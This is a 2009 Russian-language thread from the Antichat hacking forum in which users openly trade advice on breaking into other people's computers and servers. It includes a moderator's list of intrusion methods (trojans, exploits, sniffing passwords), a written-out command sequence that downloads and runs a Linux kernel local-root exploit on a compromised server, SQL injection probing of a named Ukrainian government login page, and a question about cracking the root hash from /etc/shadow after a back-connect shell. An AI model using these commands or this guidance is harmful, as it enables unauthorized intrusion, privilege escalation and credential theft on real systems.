ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #10691  
Старый 10.12.2009, 17:43
Аватар для Solide Snake
Solide Snake
Moderator - Level 7
Регистрация: 28.04.2007
Сообщений: 547
Провел на форуме:
5516499

Репутация: 3702


Отправить сообщение для Solide Snake с помощью ICQ
По умолчанию

Цитата:
Сообщение от Jessi Parker  
Как взломать комп по LAN.
P.S. Спрашиваю чисто в учебных целях)))
1 Запустить троян на удалённый комп
- найти приват трой или купить его билд.
- послать ссылку с ****** / либо тупо впарить.
2 Использовать Сплоиты
- найти свежую дырку (в баг листах)
- ну и естественно придётся порты сканить на наличие уязвимых сервисов.
3 Сканеры расшаренных ресурсов + сканеры портов и т.п.
- берём сканер заряжаем свой диапазон и в путь. Есть p2p-сеть значит многие расшарили свои диски.
4 Снифание трафика.
- вешаем снифер и ловим пароли.
5 Можно взломать роутер.
 
Ответить с цитированием

  #10692  
Старый 10.12.2009, 17:44
Аватар для [Forest]
[Forest]
Новичок
Регистрация: 07.11.2009
Сообщений: 23
Провел на форуме:
189458

Репутация: 10
По умолчанию

Есть шелл на сервер. Нада получить рута. Беру этот сплойт:

http://www.woneninjeelement.nl/images/stories/2.4.x%20and%202.6.x.txt (рутать надо не этот сайт)

При копмиляции выдаёт кучу ошибок Может нужно сплойт подправить, хз ядро - Linux 2.6.18 . Подскажите что можно сделать... мб нужно другой сплойт?

Последний раз редактировалось [Forest]; 10.12.2009 в 17:48..
 
Ответить с цитированием

  #10693  
Старый 10.12.2009, 17:57
Аватар для mailbrush
mailbrush
Познавший АНТИЧАТ
Регистрация: 24.06.2008
Сообщений: 1,996
Провел на форуме:
6075534

Репутация: 2731


Отправить сообщение для mailbrush с помощью ICQ
По умолчанию

Код:
uname -a
Покажи что выводит данная команда.
Если ядро обновлено до 13 августа этого года, то используй эксплоит sock_sendpage - http://milw0rm.com/exploits/9641

Юзать примерно так:
Код:
cd /tmp
mkdir my
chmod 777 my
cd my
wget http://milw0rm.com/sploits/2009-linux-sendpage3.tar.gz
tar xvfz 2009-linux-sendpage3.tar.gz
chmod 777 linux-sendpage3 -R
cd linux-sendpage3
./run
id
 
Ответить с цитированием

  #10694  
Старый 10.12.2009, 18:03
Аватар для [Forest]
[Forest]
Новичок
Регистрация: 07.11.2009
Сообщений: 23
Провел на форуме:
189458

Репутация: 10
По умолчанию

Цитата:
Сообщение от mailbrush  
Код:
uname -a
Покажи что выводит данная команда.
Если ядро обновлено до 13 августа этого года, то используй эксплоит sock_sendpage - http://milw0rm.com/exploits/9641

Юзать примерно так:
Код:
cd /tmp
mkdir my
chmod 777 my
cd my
wget http://milw0rm.com/sploits/2009-linux-sendpage3.tar.gz
tar xvfz 2009-linux-sendpage3.tar.gz
chmod 777 linux-sendpage3 -R
cd linux-sendpage3
./run
id
./run
mmap: Permission denied
 
Ответить с цитированием

  #10695  
Старый 10.12.2009, 18:24
Аватар для mailbrush
mailbrush
Познавший АНТИЧАТ
Регистрация: 24.06.2008
Сообщений: 1,996
Провел на форуме:
6075534

Репутация: 2731


Отправить сообщение для mailbrush с помощью ICQ
По умолчанию

Значит патченное ядро.
 
Ответить с цитированием

  #10696  
Старый 10.12.2009, 19:03
Аватар для 547
547
Участник форума
Регистрация: 11.10.2009
Сообщений: 116
Провел на форуме:
472147

Репутация: 211
По умолчанию

http://www.pz.gov.ua/login/login.php?lid=1
при подставлении кавычки в поле логин...

шибка во время выполнения запроса: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''''' at line 1

а так

http://www.pz.gov.ua/login/login.php?lid=-1

ORA-00936: missing expression

это как понимать? один сайт работает на разных БД?
 
Ответить с цитированием

  #10697  
Старый 10.12.2009, 19:26
Аватар для .:[melkiy]:.
.:[melkiy]:.
Постоянный
Регистрация: 25.01.2009
Сообщений: 368
Провел на форуме:
5290740

Репутация: 912
По умолчанию

Цитата:
Сообщение от 547  
http://www.pz.gov.ua/login/login.php?lid=1
при подставлении кавычки в поле логин...

шибка во время выполнения запроса: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''''' at line 1

а так

http://www.pz.gov.ua/login/login.php?lid=-1

ORA-00936: missing expression

это как понимать? один сайт работает на разных БД?

_http://forum.antichat.ru/showpost.php?p=1725903&postcount=11344
 
Ответить с цитированием

  #10698  
Старый 10.12.2009, 20:05
Аватар для 547
547
Участник форума
Регистрация: 11.10.2009
Сообщений: 116
Провел на форуме:
472147

Репутация: 211
По умолчанию

Цитата:
Сообщение от .:[melkiy]:.  
_http://forum.antichat.ru/showpost.php?p=1725903&postcount=11344
ну там еще и мускуль...
 
Ответить с цитированием

  #10699  
Старый 10.12.2009, 20:41
Аватар для Jessi Parker
Jessi Parker
Новичок
Регистрация: 10.12.2009
Сообщений: 2
Провел на форуме:
2846

Репутация: 0
По умолчанию

Цитата:
Сообщение от Solide Snake  
1 Запустить троян на удалённый комп
- найти приват трой или купить его билд.
- послать ссылку с ****** / либо тупо впарить.
2 Использовать Сплоиты
- найти свежую дырку (в баг листах)
- ну и естественно придётся порты сканить на наличие уязвимых сервисов.
3 Сканеры расшаренных ресурсов + сканеры портов и т.п.
- берём сканер заряжаем свой диапазон и в путь. Есть p2p-сеть значит многие расшарили свои диски.
4 Снифание трафика.
- вешаем снифер и ловим пароли.
5 Можно взломать роутер.
Спс, половину не понял. Дальше буду Гуглить.
 
Ответить с цитированием

  #10700  
Старый 10.12.2009, 21:02
Аватар для .:[melkiy]:.
.:[melkiy]:.
Постоянный
Регистрация: 25.01.2009
Сообщений: 368
Провел на форуме:
5290740

Репутация: 912
По умолчанию

Получил рута через бэк-коннект. Как теперь сделать чтобы смог подключиться через putty? Мб расшифровать хэш рута с /etc/shadow? Есть еще какие-то способы?
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился) PEPSICOLA Болталка 188 23.05.2010 10:05
Ваши любимые компьютерные игры PEPSICOLA Болталка 280 19.08.2009 00:01
Ваши телеги... F-IFTY Болталка 13 18.08.2009 18:22
Вопросы по Ipb 2.0 Voodoo_People Форумы 26 15.02.2005 22:57



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ